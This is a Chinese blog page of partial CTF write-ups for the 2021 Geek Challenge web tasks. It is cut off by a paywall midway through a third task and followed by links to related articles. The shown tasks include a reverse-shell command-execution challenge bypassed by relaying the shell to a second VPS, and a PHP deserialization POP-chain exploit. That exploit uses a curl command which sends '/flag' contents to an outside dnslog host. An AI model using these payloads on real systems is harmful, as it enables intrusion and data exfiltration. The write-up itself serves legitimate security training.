[2021极客大挑战]部分wp

最新推荐文章于 2022-05-27 13:26:30 发布
最新推荐文章于 2022-05-27 13:26:30 发布
阅读量3.8k 收藏 2
点赞数 2
分类专栏: 比赛wp 文章标签: java 网络安全 php web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/120835956
版权

Where_is_my_FUMO

开局是给了一个反弹shell的命令执行

<?php
function chijou_kega_no_junnka($str) {
   
    $black_list = [">", ";", "|", "{", "}", "/", " "];
    return str_replace($black_list, "", $str);
}

if (isset($_GET['DATA'])) {
   
    $data = $_GET['DATA'];
    $addr = chijou_kega_no_junnka($data['ADDR']);
    $port = chijou_kega_no_junnka($data['PORT']);
    exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
   
    highlight_file(__FILE__);
}

这里只能添加ip和端口,而且ban了>和空格
这个反弹shell有点特殊,他可以执行命令但是没有回显,这里我本来是想着看看有没有办法能直接打有回显的shell但是太菜了打不了

我一开始的想法是直接盲打,先把更目录给写到txt文件里面,再通过web访问,但是很可惜,写不进

ls / > ./fxz.txt

后来灵光一动,既然可以执行命令,我不如再跳一次shell到我第二台vps上不就可以弹有回显的了嘛

payload

http://1.14.102.22:8115/?DATA[ADDR]=ip&DATA[PORT]=8866

然后第一台vps接收shell
再弹有回显的shell到第二台vps
在这里插入图片描述
成功接收到,直接ls /
在这里插入图片描述
用base64加密cat一下,然后复制出来转图片
在这里插入图片描述
拿到flag
在这里插入图片描述
或者简单一点,直接用dnslog去打
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后同理读取图片即可

babyPOP

pop链构造

<?php
class a {
   
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
    public function __construct(){
   
        $this->fff=new c();
    }
}

class b{
   
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct(){
   
        $this->i_want_2_listen_2_MaoZhongDu = "curl http://a6qw99.ceye.io/`cat /flag`";
    }


    public function __toString()
    {
   
        if (a::$Do_u_like_AFKL) {
   
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
   
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
   
    public function __construct(){
   
        $this->aaa = new e();
    }

    public function __wakeup()
    {
   
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
   
    public function __construct(){
   
        $this->value = new b();
    }

    public function __invoke()
    {
   
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
   
    public function  __construct(){
   
        $this->afkl = new d();
    }

    public function __destruct()
    {
   
        if (a::$Do_u_like_JiaRan) {
   
            ($this->afkl)();
        } else {
   
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

$u = new a();
echo base64_encode(serialize($u));

从a类进入,然后转到c类,c类赋值后转到e类,e类把d类写进afkl变量,然后执行($this->afkl)();
去触发d类的__invoke()方法,$this->value触发到b类的__toString()函数从而执行到命令

本来想反弹shell,但是不知道为啥弹不出,本机测试成功了,远程没打通,所以还是用了dnslog去打无回显命令执行
在这里插入图片描述

givemeyourlove

题目提示了要打redis,看源码是一个ssrf
而且提示了密码是123123

<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_ma
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 423
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
极客挑战2019Hardsql
uuzfumo的博客
11-06 413
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
2021 极客挑战 web
Blazing-Angel的博客
02-09 1033
前言 拖了老长时间没写wp了,这题写的真爽 Dark 给了一个url: http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/ 搜了一下后缀 onion 下一个洋葱浏览器 访问地址即可 Welcome2021 查看源码: <!-- 请使用WELCOME请求方法来请求此网页 --> 一直不理解什么是welcome请求方法 其实就是换个请求方法 Babysql Sqlmap跑一下 Babypop <?p
2021极客挑战WP集合
Love&Share
11-20 1970
WP来自齐鲁师范学院网络安全社团 关注公众号接收更多最新的安全讯息 文章目录WEBDarkWelcome2021babypybabyphpbabypopwhere_is_my_FUMO蜜雪冰城甜蜜蜜easyPOPbabysqlBaby_PHP_Black_Magic_Enlightenment人民艺术家givemeyourloveRERe0调试easypyc刘壮桌面美化大师PWNRetxxxeasycanaryeasyfmt恋爱小游戏恋爱小游戏2.0checkinpwn777MISC今天有被破防吗Cryp
极客挑战2021-部分wp
qq_53460654的博客
12-15 1613
DARK 看到后缀去搜然后洋葱浏览器下载打开即可. SYC{hav3_fUn_1n_darK} welcome2021 f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式。 访问fllllaaaggg9.php发现这是个跳转页面,抓包发送一次得到flag SYC{WeLcom3_t0_Geek_2o21!!} babysql 简单试了试1’union select 1,2,3,4#,发现有两个回显点 先爆数据库 1'union select group_concat(schem
无回显getshell
Sentiment的博客
11-28 3276
自从打完Geek challenge后发现现在的很多题都趋于一种无回显getshell的形式,像反序列化、SSTI、RCE、代码审计等题目都会出现,记录几道复现出的无回显getshell where_is_my_FUMO(反弹shell) <?php function chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_
php反序列化语句实例,PHP反序列化的一些例子
weixin_34006872的博客
03-11 624
之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
BUUCTF系列 // [极客挑战 2019] Http
qq_45805420的博客
09-25 1566
前言 本题知识点:常用 HTTP 请求头 WP 打开题目,在页面中没有发现明显的提示,查看网页源码,经搜索后发现一个似乎存在猫腻的网页 ‘Secret.php’ 访问该页面,得到第一个提示 题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面,故使用 burpsuite 抓包,在请求头中增加 Referer 字段即可 Referer HTTP Referer是 header 的一部分,当浏览器向 Web 服务器发送请求的时候,一般会带上 Referer,告诉服务器该网页是从
BUUCTF系列 // [极客挑战 2019] Secret File
qq_45805420的博客
09-25 549
前言 本题知识点:PHP 文件包含漏洞 & 利用网页背景隐藏信息 WP 进入题目页面,乍看没有什么明显的思路,查看网页源代码,发现源码中出现了部分在页面中被隐藏了的信息,这才意识到了出题者的心思 这个小技巧原理并不复杂,主要是在前端中利用网页的背景颜色来覆盖相同颜色的内容,使得相关信息肉眼不可见,初次相遇确实不易 Get 到思路,可以通过全选页面内容的方式,使所有的信息展现出来 点击隐藏信息,题目跳转到了一个新的页面 尝试点击SECRET按钮,网页再次跳转 根据该页面的信息判断,SECRET
【python】OCR
bryant_meng
12-16 3191
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4214
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
str_replace 4个用法及与strtr区别
weixin_38230961的博客
09-18 1091
//实例一:字符串替换字符串 $str1 = str_replace("red","black","red green yellow pink purple"); echo $str1; //输出结果为black green yellow pink purple //实例二:字符串替换数组键值(替换多个) $arr = array("blue","red","greenred","ye......
php替换敏感字符串,php实现的替换敏感字符串类实例_PHP
weixin_35615322的博客
04-09 146
本文实例讲述了php实现的替换敏感字符串类及其用法,在php程序开发中有着非常广泛的应用价值。分享给大家供大家参考。具体方法如下:StrFilter.class.php类文件如下:_white_list = $white_list;$this->_black_list = $black_list;$this->_replacement = $replacement;}/** 替换非法字...
Object.create()(新建)&&delete(删除)方法详解
qq_41951724的博客
09-27 1599
新建对象的方法: 直接创建对象: let ojb ={} 使用 new 关键字进行创建: let obj = new Object() 使用 Object.create() 进行创建: class Parent{ constructor(name){ this.name = name } myfun = () => { console.log("我是父类的方法") } } let p1 = new Parent("father") let p2 = Object.cr
phpinfo查看可以解析的后缀_浅谈ctf中phpinfo需要关注的点
weixin_34646919的博客
01-28 522
首先我们先谈谈php各个版本的的差异php5.2以前__autoload()加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register()加载类关于 autoload()函数,如果定义了该函数,该代码就会被调用关于spl_autoload_register()函数:注册给定的函数作为autoload 的实现当出现未定义的类时,标准PHP库会按照注册的倒序逐个调用被注册...
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1690
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 729
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
渗透测试 跨站攻击手法剖析
网站安全专家
10-09 487
上一节讲到了渗透测试中xss跨站攻击检测方法和防护,这一节也是关于跨站攻击的另一个手法CSRF,很多客户找到我们Sinesafe想要了解更多的跨站攻击检测方法以及防御此类攻击的办法,想要让网站的安全性更加坚固,对此提醒大家渗透测试网站必须要拿到授权才能测试哦! 3.3.1. 简介 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click A...
BUUCTF[极客挑战2019]Secret File
weixin_45253622的博客
05-06 178
查看源码: 出现了两个跳转。 Archive_room.php end.php 输入flag.php 没有,我们分别抓包看看。
极客挑战 2019]EasySQL
最新发布
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值